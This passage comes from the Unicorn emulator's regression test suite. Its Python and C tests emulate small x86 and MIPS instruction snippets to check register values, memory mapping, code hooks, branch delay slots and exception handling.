        rdi = mu.reg_read(UC_X86_REG_RDI)
        r8 = mu.reg_read(UC_X86_REG_R8)
        r9 = mu.reg_read(UC_X86_REG_R9)
        r10 = mu.reg_read(UC_X86_REG_R10)
        r11 = mu.reg_read(UC_X86_REG_R11)
        r12 = mu.reg_read(UC_X86_REG_R12)
        r13 = mu.reg_read(UC_X86_REG_R13)
        r14 = mu.reg_read(UC_X86_REG_R14)
        r15 = mu.reg_read(UC_X86_REG_R15)
        eflags = mu.reg_read(UC_X86_REG_EFLAGS)
        print(">>> RAX = %x" % rax)
        print(">>> RBX = %x" % rbx)
        print(">>> RCX = %x" % rcx)
        print(">>> RDX = %x" % rdx)
        print(">>> RSI = %x" % rsi)
        print(">>> RDI = %x" % rdi)
        print(">>> R8 = %x" % r8)
        print(">>> R9 = %x" % r9)
        print(">>> R10 = %x" % r10)
        print(">>> R11 = %x" % r11)
        print(">>> R12 = %x" % r12)
        print(">>> R13 = %x" % r13)
        print(">>> R14 = %x" % r14)
        print(">>> R15 = %x" % r15)
        print(">>> EFLAGS = %x" % eflags)
        print("-" * 11)
        self.multipath()
        print("-" * 11)

    # callback for tracing memory access (READ or WRITE)
    def hook_mem_access(self, uc, access, address, size, value, user_data):
        if access == UC_MEM_WRITE:
            print(">>> Memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % (address, size, value))
        else:  # READ
            print(">>> Memory is being READ at 0x%x, data size = %u" % (address, size))

    # callback for tracing invalid memory access (READ or WRITE)
    def hook_mem_invalid(self, uc, access, address, size, value, user_data):
        print("[ HOOK_MEM_INVALID - Address: %s ]" % hex(address))
        if access == UC_MEM_WRITE_UNMAPPED:
            print(">>> Missing memory is being WRITE at 0x%x, data size = %u, data value = 0x%x" % (address, size, value))
            return True
        else:
            print(">>> Missing memory is being READ at 0x%x, data size = %u, data value = 0x%x" % (address, size, value))
            return True

    def hook_mem_fetch_unmapped(self, uc, access, address, size, value, user_data):
        print("[ HOOK_MEM_FETCH - Address: %s ]" % hex(address))
        print("[ mem_fetch_unmapped: faulting address at %s ]" % hex(address))
        return True

    def runTest(self):
        global mu
        JUMP = b"\x48\x31\xc0\x48\xb8\x04\x00\x00\x00\x00\x00\x00\x00\x48\x3d\x05\x00\x00\x00\x74\x05\xe9\x0f\x00\x00\x00\x48\xba\xbe\xba\x00\x00\x00\x00\x00\x00\xe9\x0f\x00\x00\x00\x48\xba\xca\xc0\x00\x00\x00\x00\x00\x00\xe9\x00\x00\x00\x00\x90"
        ADDRESS = 0x1000000

        print("Emulate x86_64 code")
        # Initialize emulator in X86-64bit mode
        mu = Uc(UC_ARCH_X86, UC_MODE_64)

        # map 2MB memory for this emulation
        mu.mem_map(ADDRESS, 2 * 1024 * 1024)

        # write machine code to be emulated to memory
        mu.mem_write(ADDRESS, JUMP)

        # setup stack
        mu.reg_write(UC_X86_REG_RSP, ADDRESS + 0x200000)

        # tracing all basic blocks with customized callback
        mu.hook_add(UC_HOOK_BLOCK, self.hook_block)

        # tracing all instructions in range [ADDRESS, ADDRESS+0x60]
        mu.hook_add(UC_HOOK_CODE, self.hook_code, None, ADDRESS, ADDRESS + 0x60)

        # tracing all memory READ & WRITE access
        mu.hook_add(UC_HOOK_MEM_WRITE, self.hook_mem_access)
        mu.hook_add(UC_HOOK_MEM_READ, self.hook_mem_access)
        mu.hook_add(UC_HOOK_MEM_FETCH_UNMAPPED, self.hook_mem_fetch_unmapped)
        mu.hook_add(UC_HOOK_MEM_READ_UNMAPPED | UC_HOOK_MEM_WRITE_UNMAPPED, self.hook_mem_invalid)

        try:
            # emulate machine code in infinite time
            mu.emu_start(ADDRESS, ADDRESS + len(JUMP))
        except UcError as e:
            print("ERROR: %s" % e)

        rdx = mu.reg_read(UC_X86_REG_RDX)
        self.assertEqual(rdx, 0xbabe, "RDX contains the wrong value. Eflags modification failed.")

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/leaked_refs.py

#!/usr/bin/python
from __future__ import print_function
import time

from unicorn import *
from unicorn.x86_const import *

import objgraph

import regress

ADDRESS = 0x8048000
STACK_ADDRESS = 0xffff000
STACK_SIZE = 4096

'''
31 DB    xor ebx, ebx
53       push ebx
43       inc ebx
53       push ebx
6A 02    push 2
6A 66    push 66h
58       pop eax
89 E1    mov ecx, esp
CD 80    int 80h
'''
CODE = b"\x31\xDB\x53\x43\x53\x6A\x02\x6A\x66\x58\x89\xE1\xCD\x80"
EP = ADDRESS + 0x54

def hook_code(mu, address, size, user_data):
    print(">>> Tracing instruction at 0x%x, instruction size = %u" % (address, size))

def emu_loop():
    emu = Uc(UC_ARCH_X86, UC_MODE_32)
    emu.mem_map(ADDRESS, 0x1000)
    emu.mem_write(EP, CODE)
    emu.mem_map(STACK_ADDRESS, STACK_SIZE)
    emu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + STACK_SIZE)

    i = emu.hook_add(UC_HOOK_CODE, hook_code, None)
    emu.hook_del(i)

    emu.emu_start(EP, EP + len(CODE), count=3)
    print("EIP: 0x%x" % emu.reg_read(UC_X86_REG_EIP))

def debugMem():
    import gc
    gc.collect()  # don't care about stuff that would be garbage collected properly
    #print("Orphaned objects in gc.garbage:", gc.garbage)
    assert(len(objgraph.by_type("Uc")) == 0)
    #assert(len(objgraph.get_leaking_objects()) == 0)

class EmuLoopReferenceTest(regress.RegressTest):
    def runTest(self):
        for i in range(5):
            emu_loop()
            debugMem()

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/map_crash.c

#include <unicorn/unicorn.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define UC_BUG_WRITE_SIZE 13000
#define UC_BUG_WRITE_ADDR 0x1000

int main(void)
{
    int size;
    uint8_t *buf;
    uc_engine *uc;
    uc_err err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc);
    if (err) {
        fprintf(stderr, "Cannot initialize unicorn\n");
        return 1;
    }
    size = UC_BUG_WRITE_SIZE;
    buf = malloc(size);
    if (!buf) {
        fprintf(stderr, "Cannot allocate\n");
        return 1;
    }
    memset(buf, 0, size);
    if (!uc_mem_map(uc, UC_BUG_WRITE_ADDR, size, UC_PROT_ALL)) {
        uc_mem_write(uc, UC_BUG_WRITE_ADDR, buf, size);
    }
    uc_close(uc);
    free(buf);
    return 0;
}

unicorn-2.1.1/tests/regress/map_write.c

#include <unicorn/unicorn.h>
#include <stdio.h>
#include <stdlib.h>

#define ADDR 0x00400000
#define SIZE 1024 * 64
#define OVERFLOW 1

int main(void)
{
    uc_engine *uc = NULL;
    uint8_t *buf = NULL, *buf2 = NULL;
    int i;
    uc_err err;

    err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc);
    if (err) {
        printf("uc_open %d\n", err);
        goto exit;
    }
    err = uc_mem_map(uc, ADDR, SIZE, UC_PROT_ALL);
    if (err) {
        printf("uc_mem_map %d\n", err);
        goto exit;
    }
    buf = calloc(SIZE * 2, 1);
    buf2 = calloc(SIZE, 1);
    for (i = 0; i < SIZE; i++) {
        buf[i] = i & 0xff;
    }
    /* crash here */
    err = uc_mem_write(uc, ADDR, buf, SIZE + OVERFLOW);
    if (err) {
        printf("uc_mem_write %d\n", err);
        goto exit;
    }
    err = uc_mem_read(uc, ADDR + 10, buf2, 4);
    if (err) {
        printf("uc_mem_read %d\n", err);
        goto exit;
    }
    if (buf2[0] != 0xa) {
        printf("mem contents are wrong\n");
        goto exit;
    }
    printf("OK\n");
exit:
    if (uc)
        uc_close(uc);
    free(buf);
    free(buf2);
    return err ? 1 : 0;
}

unicorn-2.1.1/tests/regress/memmap.py

#!/usr/bin/python
# By Ryan Hileman, issue #9

# this prints out 2 lines and the contents must be the same

import unicorn
from unicorn import *
import regress

class MemMap(regress.RegressTest):
    def test_mmap_write(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_64)
        uc.mem_map(0x8048000, 0x2000)
        uc.mem_write(0x8048000, b'test')
        s1 = bytes(uc.mem_read(0x8048000, 4)).hex()
        self.assertEqual(b'test'.hex(), s1)
        uc.mem_map(0x804a000, 0x8000)
        s2 = bytes(uc.mem_read(0x8048000, 4)).hex()
        self.assertEqual(s1, s2)

    def test_mmap_invalid(self):
        u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)
        with self.assertRaises(UcError):
            u.mem_map(0x2000, 0)
        with self.assertRaises(UcError):
            u.mem_map(0x4000, 1)

    def test_mmap_weird(self):
        u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)
        for i in range(20):
            with self.assertRaises(UcError):
                u.mem_map(i * 0x1000, 5)
                u.mem_read(i * 0x1000 + 6, 1)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/memmap_segfault.py

#!/usr/bin/env python
import unicorn
from unicorn import *
import regress

class MmapSeg(regress.RegressTest):
    def test_seg1(self):
        u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)
        u.mem_map(0x2000, 0x1000)
        u.mem_read(0x2000, 1)

        for i in range(50):
            u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)
            u.mem_map(i * 0x1000, 0x1000)
            u.mem_read(i * 0x1000, 1)

        for i in range(20):
            with self.assertRaises(UcError):
                u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32)
                u.mem_map(i * 0x1000, 5)
                u.mem_read(i * 0x1000, 1)

    def test_seg2(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_32)
        uc.mem_map(0x0000, 0x2000)
        uc.mem_map(0x2000, 0x4000)
        uc.mem_write(0x1000, 0x1004 * b' ')
        self.assertTrue(1, 'If not reached, then we have BUG (crash on x86_64 Linux).')

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/mips_branch_delay.py

#!/usr/bin/python
from capstone import *
from unicorn import *
import regress

class MipsBranchDelay(regress.RegressTest):
    def runTest(self):
        md = Cs(CS_ARCH_MIPS, CS_MODE_MIPS32 + CS_MODE_LITTLE_ENDIAN)

        def disas(code, addr):
            for i in md.disasm(code, addr):
                print('0x%x: %s %-6s %s' % (i.address, bytes(i.bytes).hex(), i.mnemonic, i.op_str))

        def hook_code(uc, addr, size, _):
            mem = bytes(uc.mem_read(addr, size))
            disas(mem, addr)

        CODE = 0x400000
        asm = bytes.fromhex('0000a4126a00822800000000')  # beq $a0, $s5, 0x4008a0; slti $v0, $a0, 0x6a; nop

        print('Input instructions:')
        disas(asm, CODE)
        print()

        print('Hooked instructions:')

        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)
        uc.hook_add(UC_HOOK_CODE, hook_code)
        uc.mem_map(CODE, 0x1000)
        uc.mem_write(CODE, asm)

        self.assertEqual(None, uc.emu_start(CODE, CODE + len(asm)))

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/mips_branch_likely_issue.c

/*
   Test for MIPS branch likely instructions only executing their delay slot
   instruction when the branch is taken. Currently it seems to always execute
   the delay slot instruction like a normal non-"likely" style branch.
 */

// windows specific
#ifdef _MSC_VER
#include <io.h>
#include <windows.h>
#include <process.h>
#define PRIx64 "llX"
#include <unicorn/unicorn.h>
#ifdef _WIN64
#pragma comment(lib, "unicorn_staload64.lib")
#else // _WIN64
#pragma comment(lib, "unicorn_staload.lib")
#endif // _WIN64

// posix specific
#else // _MSC_VER
#include <unicorn/unicorn.h>
#include "pthread.h"
#endif // _MSC_VER

// common includes
#include <string.h>

const uint64_t addr = 0x100000;

// This code SHOULD execute the instruction at 0x100010.
const unsigned char test_code_1[] = {
    0x00,0x00,0x04,0x24, // 100000: li   $a0, 0
    0x01,0x00,0x02,0x24, // 100004: li   $v0, 1
    0x02,0x00,0x03,0x24, // 100008: li   $v1, 2
    0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014
    0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0
};

// This code SHOULD NOT execute the instruction at 0x100010.
const unsigned char test_code_2[] = {
    0x00,0x00,0x04,0x24, // 100000: li   $a0, 0
    0x01,0x00,0x02,0x24, // 100004: li   $v0, 1
    0x01,0x00,0x03,0x24, // 100008: li   $v1, 1
    0x01,0x00,0x62,0x54, // 10000C: bnel $v1, $v0, 0x100014
    0x21,0x20,0x62,0x00, // 100010: addu $a0, $v1, $v0
};

int test_num = 0;

// flag for whether the delay slot was executed by the emulator
bool test1_delayslot_executed = false;
bool test2_delayslot_executed = false;

// flag for whether the delay slot had a code hook called for it
bool test1_delayslot_hooked = false;
bool test2_delayslot_hooked = false;

// This hook is used to show that code is executing in the emulator.
static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    printf("Test %d Executing: %"PRIx64"\n", test_num, address);
    if (test_num == 1 && address == 0x100010) {
        printf("Delay slot hook called!\n");
        test1_delayslot_hooked = true;
    }
    if (test_num == 2 && address == 0x100010) {
        printf("Delay slot hook called!\n");
        test2_delayslot_hooked = true;
    }
}

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_err err;
    uc_hook hhc;
    uint32_t val;

    // Initialize emulator in MIPS 32bit little endian mode
    printf("uc_open()\n");
    err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return err;
    }

    // map in a page of mem
    printf("uc_mem_map()\n");
    err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL);
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        return err;
    }

    // hook all instructions by having @begin > @end
    printf("uc_hook_add()\n");
    err = uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0);
    if (err) {
        printf("Failed on uc_hook_add(code) with error returned: %u\n", err);
        return err;
    }

    // write test1 code to be emulated to memory
    test_num = 1;
    printf("\nuc_mem_write(1)\n");
    err = uc_mem_write(uc, addr, test_code_1, sizeof(test_code_1));
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        return err;
    }

    // start executing test code 1
    printf("uc_emu_start(1)\n");
    uc_emu_start(uc, addr, addr + sizeof(test_code_1), 0, 0);

    // read the value from a0 when finished executing
    uc_reg_read(uc, UC_MIPS_REG_A0, &val);
    printf("a0 is %X\n", val);
    if (val != 0)
        test1_delayslot_executed = true;

    // write test2 code to be emulated to memory
    test_num = 2;
    printf("\nuc_mem_write(2)\n");
    err = uc_mem_write(uc, addr, test_code_2, sizeof(test_code_2));
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        return err;
    }

    // start executing test code 2
    printf("uc_emu_start(2)\n");
    uc_emu_start(uc, addr, addr + sizeof(test_code_2), 0, 0);

    // read the value from a0 when finished executing
    uc_reg_read(uc, UC_MIPS_REG_A0, &val);
    printf("a0 is %X\n", val);
    if (val != 0)
        test2_delayslot_executed = true;

    // free resources
    printf("\nuc_close()\n");
    uc_close(uc);

    // print test results
    printf("\n\nTest 1 SHOULD execute the delay slot instruction:\n");
    printf("  Emulator %s execute the delay slot: %s\n",
           test1_delayslot_executed ? "did" : "did not",
           test1_delayslot_executed ? "CORRECT" : "WRONG");
    printf("  Emulator %s hook the delay slot: %s\n",
           test1_delayslot_hooked ? "did" : "did not",
           test1_delayslot_hooked ? "CORRECT" : "WRONG");

    printf("\n\nTest 2 SHOULD NOT execute the delay slot instruction:\n");
    printf("  Emulator %s execute the delay slot: %s\n",
           test2_delayslot_executed ? "did" : "did not",
           !test2_delayslot_executed ? "CORRECT" : "WRONG");
    printf("  Emulator %s hook the delay slot: %s\n",
           test2_delayslot_hooked ?
"did" : "did not", !test2_delayslot_hooked ? "CORRECT" : "WRONG"); // test 1 SHOULD execute the instruction in the delay slot if( test1_delayslot_hooked == true && test1_delayslot_executed == true ) printf("\n\nTEST 1 PASSED!\n"); else printf("\n\nTEST 1 FAILED!\n"); // test 2 SHOULD NOT execute the instruction in the delay slot if( test2_delayslot_hooked == false && test2_delayslot_executed == false ) printf("TEST 2 PASSED!\n\n"); else printf("TEST 2 FAILED!\n\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_cp1.py�������������������������������������������������������������0000664�0000000�0000000�00000000511�14675241067�0020102�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.mips_const import * # .text:00416CB0 cfc1 $v1, FCSR shellcode = [0x44, 0x43, 0xF8, 0x00] base = 0x416CB0 uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) uc.mem_map(0x416000, 0x1000) uc.mem_write(base, bytes(shellcode)) uc.emu_start(base, base + len(shellcode))���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_delay_slot_code_hook.c���������������������������������������������0000664�0000000�0000000�00000006502�14675241067�0023370�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Test for code hook being called for instructions in branch delay slot in MIPS cpu. See issue https://github.com/unicorn-engine/unicorn/issues/290 The code hook should be called for every instruction executed. This test checks that the code hook is correctly called for instructions in branch delay slots. In this test the loop check value is decremented inside the branch delay shot. This helps to show that the instruction in the branch delay slot is being executed, but that the code hook is just not occurring. */ // windows specific #ifdef _MSC_VER #include <io.h> #include <windows.h> #define PRIx64 "llX" #include <unicorn/unicorn.h> #ifdef _WIN64 #pragma comment(lib, "unicorn_staload64.lib") #else // _WIN64 #pragma comment(lib, "unicorn_staload.lib") #endif // _WIN64 // posix specific #else // _MSC_VER #include <unicorn/unicorn.h> #endif // _MSC_VER // common includes #include <string.h> // Test MIPS little endian code. // It should loop 3 times before ending. 
const uint64_t addr = 0x100000;
const unsigned char loop_test_code[] = {
    0x02,0x00,0x04,0x24, // 100000: li    $a0, 2
    // loop1
    0x00,0x00,0x00,0x00, // 100004: nop
    0xFE,0xFF,0x80,0x14, // 100008: bnez  $a0, loop1
    0xFF,0xFF,0x84,0x24, // 10000C: addiu $a0, -1
};

bool test_passed_ok = false;
int loop_count = 0;

static void mips_codehook(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    if (address == 0x10000C)
        test_passed_ok = true;
    if (address == 0x100004) {
        printf("\nloop %d:\n", loop_count);
        loop_count++;
    }
    printf("Code: %"PRIx64"\n", address);
}

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    uc_err err;
    uc_hook hhc;
    uint32_t val;

    // Initialize emulator in MIPS 32bit little endian mode
    err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        return err;
    }

    // map in a page of mem
    err = uc_mem_map(uc, addr, 0x1000, UC_PROT_ALL);
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        return err;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, addr, loop_test_code, sizeof(loop_test_code));
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        return err;
    }

    // hook all instructions by having @begin > @end
    err = uc_hook_add(uc, &hhc, UC_HOOK_CODE, mips_codehook, NULL, 1, 0);
    if (err) {
        printf("Failed on uc_hook_add(code) with error returned: %u\n", err);
        return err;
    }

    // execute code
    printf("---- Executing Code ----\n");
    err = uc_emu_start(uc, addr, addr + sizeof(loop_test_code), 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned %u: %s\n",
               err, uc_strerror(err));
        return err;
    }

    // done executing, print some reg values as a test
    printf("---- Execution Complete ----\n\n");
    uc_reg_read(uc, UC_MIPS_REG_PC, &val);
    printf("pc is %X\n", val);
    uc_reg_read(uc, UC_MIPS_REG_A0, &val);
    printf("a0 is %X\n", val);

    // free resources
    uc_close(uc);

    if (test_passed_ok)
        printf("\n\nTEST PASSED!\n\n");
    else
        printf("\n\nTEST FAILED!\n\n");

    return 0;
}

unicorn-2.1.1/tests/regress/mips_except.py

#!/usr/bin/python
from unicorn import *
from unicorn.mips_const import *

import regress

def hook_intr(uc, intno, _):
    print('interrupt', intno)

CODE = 0x400000
asm = bytes.fromhex('0000a48f')  # lw $a0, ($sp)

class MipsExcept(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)
        uc.hook_add(UC_HOOK_INTR, hook_intr)
        uc.mem_map(CODE, 0x1000)
        uc.mem_write(CODE, asm)

        with self.assertRaises(UcError) as m:
            uc.reg_write(UC_MIPS_REG_SP, 0x400001)
            uc.emu_start(CODE, CODE + len(asm), 300)
        self.assertEqual(UC_ERR_READ_UNALIGNED, m.exception.errno)

        with self.assertRaises(UcError) as m:
            uc.reg_write(UC_MIPS_REG_SP, 0xFFFFFFF0)
            uc.emu_start(CODE, CODE + len(asm), 200)
        self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno)

        with self.assertRaises(UcError) as m:
            uc.reg_write(UC_MIPS_REG_SP, 0x80000000)
            uc.emu_start(CODE, CODE + len(asm), 100)
        self.assertEqual(UC_ERR_READ_UNMAPPED, m.exception.errno)

if __name__ == '__main__':
    regress.main()

unicorn-2.1.1/tests/regress/mips_invalid_read_of_size_4_when_tracing.c

#include <unicorn/unicorn.h>

static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    printf("tracing\n");
}

#define HARDWARE_ARCHITECTURE UC_ARCH_MIPS
#define HARDWARE_MODE UC_MODE_MIPS32
#define MEMORY_STARTING_ADDRESS 0x1000000
#define MEMORY_SIZE 2 * 1024 * 1024
#define MEMORY_PERMISSIONS UC_PROT_ALL
#define BINARY_CODE "00000000000000000000000000AA"

int main(int argc, char **argv, char **envp)
{
    uc_engine *uc;
    if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) {
        printf("uc_open(…) failed\n");
        return 1;
    }
    uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS);
    if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) {
        printf("uc_mem_write(…) failed\n");
        return 1;
    }
    uc_hook trace;
    uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL,
                MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + 1);
    printf("uc_emu_start(…)\n");
    uc_emu_start(uc, MEMORY_STARTING_ADDRESS,
                 MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0);
    printf("done\n");
    return 0;
}

unicorn-2.1.1/tests/regress/mips_kernel_mmu.py

#!/usr/bin/python
from unicorn import *
from unicorn.mips_const import *

import regress

class MipsSyscall(regress.RegressTest):
    def test(self):
        addr = 0x80000000
        code = bytes.fromhex('34213456')  # ori $at, $at, 0x3456

        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN)
        uc.mem_map(addr, 0x1000)
        uc.mem_write(addr, code)
        uc.reg_write(UC_MIPS_REG_AT, 0)
        uc.emu_start(addr, addr + len(code))

        self.assertEqual(uc.reg_read(UC_MIPS_REG_AT), 0x3456)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/mips_kseg0_1.c

#include <unicorn/unicorn.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

// Test for the MIPS kseg0 and kseg1 memory segments.
// See issue https://github.com/unicorn-engine/unicorn/issues/217
//
// The kseg0 address range 0x80000000-0x9FFFFFFF is not mapped through the MMU,
// but instead is directly translated to low ram by masking off the high address bit.
// Similarly, the kseg1 address range 0xA0000000-0xBFFFFFFF is translated directly to
// low ram by masking off the top 3 address bits.
//
// Qemu handles these address ranges correctly, but there are issues with the way
// Unicorn checks for a valid memory mapping when executing code in the kseg0 or
// kseg1 memory range. In particular, Unicorn checks for a valid mapping using the
// virtual address when executing from kseg0/1, when it should probably use the
// real address in low ram.
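// Illustrative sketch only, not part of the original test: the fixed kseg
// translation described above, with hypothetical helper names.
static inline uint32_t kseg0_to_phys(uint32_t va) { return va & 0x7FFFFFFF; } // clear bit 31
static inline uint32_t kseg1_to_phys(uint32_t va) { return va & 0x1FFFFFFF; } // clear bits 31-29
// e.g. kseg0_to_phys(0x80001000) == 0x1000 and kseg1_to_phys(0xA0001000) == 0x1000,
// which is KSEG0_1_REAL_ADDRESS below.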
#define KSEG0_VIRT_ADDRESS 0x80001000   // Virtual address in kseg0, mapped by processor (and QEMU) to 0x1000
#define KSEG1_VIRT_ADDRESS 0xA0001000   // Virtual address in kseg1, mapped by processor (and QEMU) to 0x1000
#define KSEG0_1_REAL_ADDRESS 0x1000     // Real address corresponding to the above addresses in kseg0/1

#define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456;

int main(void)
{
    uc_engine *uc;
    uc_err err;

    err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc);
    if (err) {
        printf("uc_open %d\n", err);
        return 1;
    }

    // map 4Kb memory for this emulation, into the real address space
    err = uc_mem_map(uc, KSEG0_1_REAL_ADDRESS, 4 * 1024, UC_PROT_ALL);
    if (err) {
        printf("uc_mem_map %d\n", err);
        return 1;
    }

    // write machine code to be emulated to memory
    err = uc_mem_write(uc, KSEG0_1_REAL_ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1);
    if (err) {
        printf("uc_mem_write %s\n", uc_strerror(err));
        return 1;
    }

    // Start emulation at the real address; this currently succeeds
    err = uc_emu_start(uc, KSEG0_1_REAL_ADDRESS, KSEG0_1_REAL_ADDRESS + 4, 0, 0);
    if (err) {
        printf("uc_emu_start at real address: %s\n", uc_strerror(err));
        return 1;
    }

    // Start emulation at the virtual address in kseg0; this currently fails
    err = uc_emu_start(uc, KSEG0_VIRT_ADDRESS, KSEG0_VIRT_ADDRESS + 4, 0, 0);
    if (err) {
        printf("uc_emu_start at kseg0 address: %s\n", uc_strerror(err));
        return 1;
    }

    // Start emulation at the virtual address in kseg1; this currently fails
    err = uc_emu_start(uc, KSEG1_VIRT_ADDRESS, KSEG1_VIRT_ADDRESS + 4, 0, 0);
    if (err) {
        printf("uc_emu_start at kseg1 address: %s\n", uc_strerror(err));
        return 1;
    }

    uc_close(uc);

    printf("Good, this bug is fixed!\n");
    return 0;
}
unicorn-2.1.1/tests/regress/mips_single_step_sp.py
#!/usr/bin/python
from unicorn import *
from unicorn.mips_const import *

import regress

def code_hook(uc, addr, size, user_data):
    print 'code hook: pc=%08x sp=%08x' % (addr, uc.reg_read(UC_MIPS_REG_SP))

def run(step=False):
    addr = 0x4010dc
    code = (
        'f8ff0124'  # addiu $at, $zero, -8
        '24e8a103'  # and $sp, $sp, $at
        '09f82003'  # jalr $t9
        'e8ffbd23'  # addi $sp, $sp, -0x18
        'b8ffbd27'  # addiu $sp, $sp, -0x48
        '00000000'  # nop
    ).decode('hex')

    uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)
    if step:
        uc.hook_add(UC_HOOK_CODE, code_hook)
    uc.reg_write(UC_MIPS_REG_SP, 0x60800000)
    uc.reg_write(UC_MIPS_REG_T9, addr + len(code) - 8)

    print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP))
    print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT))
    print '<run> (single step: %s)' % (str(step))

    uc.mem_map(addr & ~(0x1000 - 1), 0x2000)
    uc.mem_write(addr, code)
    uc.emu_start(addr, addr + len(code))

    print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP))
    print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT))
    print
    return uc.reg_read(UC_MIPS_REG_SP)

class MipsSingleStep(regress.RegressTest):
    def test(self):
        sp1 = run(step=False)
        sp2 = run(step=True)
        self.assertEqual(sp1, sp2)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/mips_syscall_pc.py
#!/usr/bin/python
from unicorn import *
from unicorn.mips_const import *

import regress

def intr_hook(uc, intno, data):
    print 'interrupt=%d, v0=%d, pc=0x%08x' % (intno, uc.reg_read(UC_MIPS_REG_V0), uc.reg_read(UC_MIPS_REG_PC))

class MipsSyscall(regress.RegressTest):
    def test(self):
        addr = 0x40000
        code = '0c000000'.decode('hex')  # syscall

        uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN)
        uc.mem_map(addr, 0x1000)
        uc.mem_write(addr, code)
        uc.reg_write(UC_MIPS_REG_V0, 100)
        uc.hook_add(UC_HOOK_INTR, intr_hook)

        uc.emu_start(addr, addr + len(code))

        self.assertEqual(0x40004, uc.reg_read(UC_MIPS_REG_PC))

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/mov_gs_eax.py
#!/usr/bin/python
from unicorn import *
from unicorn.x86_const import *

import regress

class MovGsEax(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_32)
        uc.mem_map(0x1000, 0x1000)
        # mov gs, eax; mov eax, 1
        code = '8ee8b801000000'.decode('hex')
        uc.mem_write(0x1000, code)
        uc.reg_write(UC_X86_REG_EAX, 0xFFFFFFFF)
        with self.assertRaises(UcError) as ex_ctx:
            uc.emu_start(0x1000, 0x1000 + len(code))
        self.assertEqual(ex_ctx.exception.errno, UC_ERR_EXCEPTION)

if __name__ == '__main__':
    regress.main()
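# (Illustrative note, not part of the original test: loading %gs with the
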